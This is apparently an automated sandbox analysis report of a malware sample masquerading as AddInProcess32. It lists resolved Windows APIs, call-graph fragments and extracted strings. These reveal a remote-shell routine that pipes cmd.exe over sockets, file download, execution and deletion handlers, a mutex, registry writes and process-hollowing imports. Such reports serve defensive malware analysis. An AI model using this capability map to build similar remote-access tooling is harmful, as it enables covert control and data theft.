47783->47786 47787 402917 47783->47787 47799 402cae 47786->47799 47789 402915 47787->47789 47790 4023ce 11 API calls 47787->47790 47789->47768 47790->47789 47792 402890 47791->47792 47793 402898 47792->47793 47798 402ca3 22 API calls 47792->47798 47793->47772 47796->47777 47797->47779 47800 402cb8 __EH_prolog 47799->47800 47806 402e54 22 API calls 47800->47806 47802 4023ce 11 API calls 47804 402d92 47802->47804 47803 402d24 47803->47802 47804->47789 47806->47803 47808 4020e7 47807->47808 47809 4023ce 11 API calls 47808->47809 47810 4020f2 47809->47810 47810->47602 47811->47602 47812->47602 47813->47592 47814->47583 47815->47606 47816->47610 47817->47612 47818->47625 47819->47625 47821->47703 47832 412829 61 API calls 47830->47832 47834 443248 _Atexit 47833->47834 47835 443396 _Atexit GetModuleHandleW 47834->47835 47843 443260 47834->47843 47837 443254 47835->47837 47837->47843 47867 4433da GetModuleHandleExW 47837->47867 47838 443268 47842 4432dd 47838->47842 47854 443306 47838->47854 47875 443ff0 20 API calls _Atexit 47838->47875 47846 4432f5 47842->47846 47876 444276 5 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 47842->47876 47855 445909 EnterCriticalSection 47843->47855 47844 443323 47859 443355 47844->47859 47845 44334f 47878 4577a9 5 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 47845->47878 47877 444276 5 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 47846->47877 47856 443346 47854->47856 47855->47838 47879 445951 LeaveCriticalSection 47856->47879 47858 44331f 47858->47844 47858->47845 47880 448d49 47859->47880 47862 443383 47865 4433da _Atexit 8 API calls 47862->47865 47863 443363 GetPEB 47863->47862 47864 443373 GetCurrentProcess TerminateProcess 47863->47864 47864->47862 47866 44338b ExitProcess 47865->47866 47868 443404 GetProcAddress 47867->47868 47869 443427 47867->47869 47870 443419 47868->47870 47871 443436 47869->47871 47872 44342d FreeLibrary 47869->47872 47870->47869 47873 43502b __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 47871->47873 47872->47871 47874 443440 47873->47874 47874->47843 47875->47842 47876->47846 47877->47854 47879->47858 47881 448d6e 47880->47881 47885 448d64 47880->47885 47886 44854a 47881->47886 47883 43502b __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 47884 44335f 47883->47884 47884->47862 47884->47863 47885->47883 47887 448576 47886->47887 47888 44857a 47886->47888 47887->47888 47892 44859a 47887->47892 47893 4485e6 47887->47893 47888->47885 47890 4485a6 GetProcAddress 47891 4485b6 __crt_fast_encode_pointer 47890->47891 47891->47888 47892->47888 47892->47890 47894 448607 LoadLibraryExW 47893->47894 47895 4485fc 47893->47895 47896 448624 GetLastError 47894->47896 47898 44863c 47894->47898 47895->47887 47896->47898 47899 44862f LoadLibraryExW 47896->47899 47897 448653 FreeLibrary 47897->47895 47898->47895 47898->47897 47899->47898 47900 40165e 47901 401666 47900->47901 47902 401669 47900->47902 47903 4016a8 47902->47903 47905 401696 47902->47905 47904 43455e new 22 API calls 47903->47904 47907 40169c 47904->47907 47906 43455e new 22 API calls 47905->47906 47906->47907

                                            Control-flow Graph

                                            APIs
                                            • LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CBF6
                                            • GetProcAddress.KERNEL32(00000000), ref: 0041CBFF
                                            • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                            • GetProcAddress.KERNEL32(00000000), ref: 0041CC19
                                            • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC2B
                                            • GetProcAddress.KERNEL32(00000000), ref: 0041CC2E
                                            • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC3F
                                            • GetProcAddress.KERNEL32(00000000), ref: 0041CC42
                                            • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040EA1C), ref: 0041CC54
                                            • GetProcAddress.KERNEL32(00000000), ref: 0041CC57
                                            • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040EA1C), ref: 0041CC63
                                            • GetProcAddress.KERNEL32(00000000), ref: 0041CC66
                                            • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                            • GetProcAddress.KERNEL32(00000000), ref: 0041CC7A
                                            • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                            • GetProcAddress.KERNEL32(00000000), ref: 0041CC8E
                                            • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040EA1C), ref: 0041CC9F
                                            • GetProcAddress.KERNEL32(00000000), ref: 0041CCA2
                                            • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                            • GetProcAddress.KERNEL32(00000000), ref: 0041CCB6
                                            • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                            • GetProcAddress.KERNEL32(00000000), ref: 0041CCCA
                                            • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                            • GetProcAddress.KERNEL32(00000000), ref: 0041CCDE
                                            • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                            • GetProcAddress.KERNEL32(00000000), ref: 0041CCF2
                                            • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                            • GetProcAddress.KERNEL32(00000000), ref: 0041CD06
                                            • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040EA1C), ref: 0041CD14
                                            • GetProcAddress.KERNEL32(00000000), ref: 0041CD17
                                            • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040EA1C), ref: 0041CD28
                                            • GetProcAddress.KERNEL32(00000000), ref: 0041CD2B
                                            • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040EA1C), ref: 0041CD38
                                            • GetProcAddress.KERNEL32(00000000), ref: 0041CD3B
                                            • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040EA1C), ref: 0041CD48
                                            • GetProcAddress.KERNEL32(00000000), ref: 0041CD4B
                                            • LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040EA1C), ref: 0041CD5D
                                            • GetProcAddress.KERNEL32(00000000), ref: 0041CD60
                                            • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040EA1C), ref: 0041CD6D
                                            • GetProcAddress.KERNEL32(00000000), ref: 0041CD70
                                            • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040EA1C), ref: 0041CD81
                                            • GetProcAddress.KERNEL32(00000000), ref: 0041CD84
                                            • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040EA1C), ref: 0041CD95
                                            • GetProcAddress.KERNEL32(00000000), ref: 0041CD98
                                            • LoadLibraryA.KERNELBASE(Rstrtmgr,RmStartSession,?,?,?,?,0040EA1C), ref: 0041CDAA
                                            • GetProcAddress.KERNEL32(00000000), ref: 0041CDAD
                                            • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0040EA1C), ref: 0041CDBA
                                            • GetProcAddress.KERNEL32(00000000), ref: 0041CDBD
                                            • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040EA1C), ref: 0041CDCA
                                            • GetProcAddress.KERNEL32(00000000), ref: 0041CDCD
                                            • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0040EA1C), ref: 0041CDDA
                                            • GetProcAddress.KERNEL32(00000000), ref: 0041CDDD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AddressProc$LibraryLoad$HandleModule
                                            • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                            • API String ID: 4236061018-3687161714
                                            • Opcode ID: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                            • Instruction ID: 87b5fa294a9840a4da0a94e675c49188b16ea4214af7843bc20054d8537ab592
                                            • Opcode Fuzzy Hash: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                            • Instruction Fuzzy Hash: 06419AA0E8035879DA107BB65D8DE3B3E5CD9857953614837B05C93550FBBCDC408EAE

                                            Control-flow Graph

                                            APIs
                                            • GetCurrentProcess.KERNEL32(00000003,PkGNG,0044332B,00000003,0046E958,0000000C,00443482,00000003,00000002,00000000,PkGNG,004461B7,00000003), ref: 00443376
                                            • TerminateProcess.KERNEL32(00000000), ref: 0044337D
                                            • ExitProcess.KERNEL32 ref: 0044338F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Process$CurrentExitTerminate
                                            • String ID: PkGNG
                                            • API String ID: 1703294689-263838557
                                            • Opcode ID: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                            • Instruction ID: 4b22f3a5ffe79ca7dfb81d814e561f82a31e4bef9a776fe0bb9daccb8e878f4b
                                            • Opcode Fuzzy Hash: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                            • Instruction Fuzzy Hash: 9FE0B635401608FBDF11AF55DE09A5D3BAAEB40B56F005469FC498A272CF79EE42CB88

                                            Control-flow Graph

                                            APIs
                                            • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00474EF8,PkGNG,00000000,00474EF8,00404CA8,00000000,?,?,?,00474EF8,?), ref: 00404E38
                                            • SetEvent.KERNEL32(?), ref: 00404E43
                                            • CloseHandle.KERNELBASE(?), ref: 00404E4C
                                            • closesocket.WS2_32(?), ref: 00404E5A
                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404E91
                                            • SetEvent.KERNEL32(?), ref: 00404EA2
                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404EA9
                                            • SetEvent.KERNEL32(?), ref: 00404EBA
                                            • CloseHandle.KERNEL32(?), ref: 00404EBF
                                            • CloseHandle.KERNEL32(?), ref: 00404EC4
                                            • SetEvent.KERNEL32(?), ref: 00404ED1
                                            • CloseHandle.KERNEL32(?), ref: 00404ED6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                            • String ID: PkGNG
                                            • API String ID: 3658366068-263838557
                                            • Opcode ID: 1684f4f73009feb69d70dfcf302ee3e014c0b3edf4bc9f5cbab22c6bf1399946
                                            • Instruction ID: 681aebbacbf541c1c6cd6dfca6fba55586e42b113d9ea1c0d4e3a90daa9851ad
                                            • Opcode Fuzzy Hash: 1684f4f73009feb69d70dfcf302ee3e014c0b3edf4bc9f5cbab22c6bf1399946
                                            • Instruction Fuzzy Hash: DE21EA71154B04AFDB216B26DC49B1BBBA1FF40326F104A2DE2E211AF1CB79B851DB58

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 30 4485e6-4485fa 31 448607-448622 LoadLibraryExW 30->31 32 4485fc-448605 30->32 34 448624-44862d GetLastError 31->34 35 44864b-448651 31->35 33 44865e-448660 32->33 38 44863c 34->38 39 44862f-44863a LoadLibraryExW 34->39 36 448653-448654 FreeLibrary 35->36 37 44865a 35->37 36->37 40 44865c-44865d 37->40 41 44863e-448640 38->41 39->41 40->33 41->35 42 448642-448649 41->42 42->40
                                            APIs
                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,0044858D,?,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue), ref: 00448618
                                            • GetLastError.KERNEL32(?,0044858D,?,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367), ref: 00448624
                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044858D,?,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000), ref: 00448632
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: LibraryLoad$ErrorLast
                                            • String ID:
                                            • API String ID: 3177248105-0
                                            • Opcode ID: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                            • Instruction ID: 239c22332ac31c5199b3ba4764290be2907fca328f5d1df1ca03bb1201a614b6
                                            • Opcode Fuzzy Hash: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                            • Instruction Fuzzy Hash: D401FC32602322EBDB618A78EC4495F7758AF15BA2B22093AF909D3241DF24DC01C6EC

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 43 40d0a4-40d0d0 call 401fab CreateMutexA GetLastError
                                            APIs
                                            • CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040EC43,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0040D0B3
                                            • GetLastError.KERNEL32 ref: 0040D0BE
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateErrorLastMutex
                                            • String ID: SG
                                            • API String ID: 1925916568-3189917014
                                            • Opcode ID: eabddf02165d7cb7ab60b975d5c9d75332e346c4e6257b5baf50d4a4f7034b19
                                            • Instruction ID: 57749e379dff282fb0cfe370275dd79dddcb706c5168e3a31171962593876721
                                            • Opcode Fuzzy Hash: eabddf02165d7cb7ab60b975d5c9d75332e346c4e6257b5baf50d4a4f7034b19
                                            • Instruction Fuzzy Hash: 0DD012B0605700EBDB186770ED5975839559744702F40487AB50FD99F1CBBC88908519

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 46 44854a-448574 47 448576-448578 46->47 48 4485df 46->48 49 44857e-448584 47->49 50 44857a-44857c 47->50 51 4485e1-4485e5 48->51 52 448586-448588 call 4485e6 49->52 53 4485a0 49->53 50->51 58 44858d-448590 52->58 54 4485a2-4485a4 53->54 56 4485a6-4485b4 GetProcAddress 54->56 57 4485cf-4485dd 54->57 59 4485b6-4485bf call 434591 56->59 60 4485c9 56->60 57->48 61 4485c1-4485c7 58->61 62 448592-448598 58->62 59->50 60->57 61->54 62->52 63 44859a 62->63 63->53
                                            APIs
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 004485AA
                                            • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004485B7
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AddressProc__crt_fast_encode_pointer
                                            • String ID:
                                            • API String ID: 2279764990-0
                                            • Opcode ID: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
                                            • Instruction ID: be9fc4cf4793659cabcfb8eeb6b3f823a3a139bea871a56029073562aa2b3f0c
                                            • Opcode Fuzzy Hash: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
                                            • Instruction Fuzzy Hash: 4B110637A00220BBFB229F1DDC4096F7395AB84364716866AFD19EB354DF34EC4186D9

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 66 40165e-401664 67 401666-401668 66->67 68 401669-401674 66->68 69 401676 68->69 70 40167b-401685 68->70 69->70 71 401687-40168d 70->71 72 4016a8-4016a9 call 43455e 70->72 71->72 73 40168f-401694 71->73 76 4016ae-4016af 72->76 73->69 75 401696-4016a6 call 43455e 73->75 78 4016b1-4016b3 75->78 76->78
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9ebd29a8193938baf2c5ce5f6ec3a3ea5040e3c3e83895a942c6279db0e0dd98
                                            • Instruction ID: 1e9d0a06bdb6e9f7b23a96960dfc4b712b0be9606a3b942e14a6d4fe6a34620f
                                            • Opcode Fuzzy Hash: 9ebd29a8193938baf2c5ce5f6ec3a3ea5040e3c3e83895a942c6279db0e0dd98
                                            • Instruction Fuzzy Hash: EBF0E2706042016BCB0C8B34CD50B2A37954B84325F248F7FF02BD61E0C73EC8918A0D

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 94 450154-450161 call 445b74 96 450166-450171 94->96 97 450177-45017f 96->97 98 450173-450175 96->98 99 4501bf-4501cd call 446802 97->99 100 450181-450185 97->100 98->99 102 450187-4501b9 call 448b04 100->102 106 4501bb-4501be 102->106 106->99
                                            APIs
                                              • Part of subcall function 00445B74: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0044834A,00000001,00000364,?,00000000,?,0043BCD6,00000000,?,?,0043BD5A,00000000), ref: 00445BB5
                                            • _free.LIBCMT ref: 004501C0
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateHeap_free
                                            • String ID:
                                            • API String ID: 614378929-0
                                            • Opcode ID: 60f99f4f74d771fb4a1326b0b926bb5a841854500e0a6ddc8464f8a9dc27050b
                                            • Instruction ID: 1bf88885f7a62dfe3e195aa205353632c6f85cb380d5d404dcdd82bf2c99678c
                                            • Opcode Fuzzy Hash: 60f99f4f74d771fb4a1326b0b926bb5a841854500e0a6ddc8464f8a9dc27050b
                                            • Instruction Fuzzy Hash: DB014976200744ABE731CF6ACC42D5AFBD8EB85370F25062EE58483281EB34A909C779

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 107 445b74-445b7f 108 445b81-445b8b 107->108 109 445b8d-445b93 107->109 108->109 110 445bc1-445bcc call 44062d 108->110 111 445b95-445b96 109->111 112 445bac-445bbd RtlAllocateHeap 109->112 116 445bce-445bd0 110->116 111->112 113 445bbf 112->113 114 445b98-445b9f call 4455c6 112->114 113->116 114->110 120 445ba1-445baa call 443001 114->120 120->110 120->112
                                            APIs
                                            • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0044834A,00000001,00000364,?,00000000,?,0043BCD6,00000000,?,?,0043BD5A,00000000), ref: 00445BB5
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID:
                                            • API String ID: 1279760036-0
                                            • Opcode ID: ce26be8ca3846e5000c6f53c40b97d329a66d538f9906bf99632d42dae41b906
                                            • Instruction ID: ef76d3429b2572ee2e16b707a9c356192af24cfd4e901c13b73aaad13af6506a
                                            • Opcode Fuzzy Hash: ce26be8ca3846e5000c6f53c40b97d329a66d538f9906bf99632d42dae41b906
                                            • Instruction Fuzzy Hash: BEF0B431500F65ABBF222E22AC05E5B3769DB81770B14412BB914EA286CA38FC0186AC

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 123 4461b8-4461c4 124 4461f6-446201 call 44062d 123->124 125 4461c6-4461c8 123->125 132 446203-446205 124->132 127 4461e1-4461f2 RtlAllocateHeap 125->127 128 4461ca-4461cb 125->128 129 4461f4 127->129 130 4461cd-4461d4 call 4455c6 127->130 128->127 129->132 130->124 135 4461d6-4461df call 443001 130->135 135->124 135->127
                                            APIs
                                            • RtlAllocateHeap.NTDLL(00000000,00435349,?,?,004388C7,?,?,00000000,00476B50,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID:
                                            • API String ID: 1279760036-0
                                            • Opcode ID: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                            • Instruction ID: 139fbca062bb8bf671a891d82c3cf8fc988f9ce198a1a8b78c24da0334343556
                                            • Opcode Fuzzy Hash: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                            • Instruction Fuzzy Hash: CEE0E531A0021267F6312A269C01B5B76599B437A0F170137AD15922D2CE6CCD0181EF
                                            APIs
                                            • SetEvent.KERNEL32(?,?), ref: 00407CF4
                                            • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407DC2
                                            • DeleteFileW.KERNEL32(00000000), ref: 00407DE4
                                              • Part of subcall function 0041C322: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00474EE0,?), ref: 0041C37D
                                              • Part of subcall function 0041C322: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00474EE0,?), ref: 0041C3AD
                                              • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C402
                                              • Part of subcall function 0041C322: FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C463
                                              • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C46A
                                              • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                              • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                              • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,00401A45,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000), ref: 00404B47
                                              • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000,?,?,?,?,?,00401A45), ref: 00404B75
                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004081D2
                                            • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004082B3
                                            • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084FF
                                            • DeleteFileA.KERNEL32(?), ref: 0040868D
                                              • Part of subcall function 00408847: __EH_prolog.LIBCMT ref: 0040884C
                                              • Part of subcall function 00408847: FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                              • Part of subcall function 00408847: __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                              • Part of subcall function 00408847: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                            • Sleep.KERNEL32(000007D0), ref: 00408733
                                            • StrToIntA.SHLWAPI(00000000,00000000), ref: 00408775
                                              • Part of subcall function 0041CA73: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                            • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                                            • API String ID: 1067849700-181434739
                                            • Opcode ID: f676259c62b52cfccf94f92d8d960cb361a95eefcbcfe61b4d852a774d262317
                                            • Instruction ID: f533dcafa702064eae222fc9ff54aa9327b172b3479e3db69e1c842a3252ef64
                                            • Opcode Fuzzy Hash: f676259c62b52cfccf94f92d8d960cb361a95eefcbcfe61b4d852a774d262317
                                            • Instruction Fuzzy Hash: F04293716043016BC604FB76C9579AE77A9AF91348F80483FF542671E2EF7C9908879B
                                            APIs
                                            • __Init_thread_footer.LIBCMT ref: 004056E6
                                              • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                            • __Init_thread_footer.LIBCMT ref: 00405723
                                            • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660CC,00000000), ref: 004057B6
                                            • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                            • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                            • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                                            • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                              • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                            • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90,004660D0,00000062,004660B4), ref: 004059E4
                                            • Sleep.KERNEL32(00000064,00000062,004660B4), ref: 004059FE
                                            • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                            • CloseHandle.KERNEL32 ref: 00405A23
                                            • CloseHandle.KERNEL32 ref: 00405A2B
                                            • CloseHandle.KERNEL32 ref: 00405A3D
                                            • CloseHandle.KERNEL32 ref: 00405A45
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                            • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                            • API String ID: 2994406822-18413064
                                            • Opcode ID: f51e1e407a3c6e3a44d55a1067086f8f81688e0a34343b3d0a2006916af40dd3
                                            • Instruction ID: feb7c3e087fbbfe745e3798ef664df189eb35a760580a6c3fca7c2e5343dee52
                                            • Opcode Fuzzy Hash: f51e1e407a3c6e3a44d55a1067086f8f81688e0a34343b3d0a2006916af40dd3
                                            • Instruction Fuzzy Hash: 1A91C271604604AFD711FB36ED42A6B369AEB84308F01443FF589A62E2DB7D9C448F6D
                                            APIs
                                            • GetCurrentProcessId.KERNEL32 ref: 00412141
                                              • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                              • Part of subcall function 004138B2: RegSetValueExA.ADVAPI32(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
